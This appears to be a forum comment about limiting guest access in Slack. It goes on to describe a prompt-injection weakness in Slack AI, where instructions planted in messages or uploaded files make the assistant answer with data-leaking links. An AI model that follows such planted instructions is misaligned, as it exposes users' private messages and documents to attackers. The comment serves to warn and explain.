Hm that's a good point, and we've done that ourselves. I believe we limited those folks to one private channel and didn't allow them to create new channels.

I think of it like an office space. If you bring in some consultants do you set up a space for them and keep them off your VPN, or do you let them run around, sit where they want, and peek over everybody's shoulder to see what they're up to?

The bigger problem here is that Slack AI has a misfeature where malicious instructions can cause it to answer questions with links that leak data. The specific examples aren't as important as the overall class of attack.

Anything you say in Slack - or anything in a document that is available within Slack - could potentially be leaked to an attacker who manages to get their malicious instructions into your Slack. There are many ways they might be able to do that, such as tricking an employee of yours into uploading a file to Slack that includes those instructions.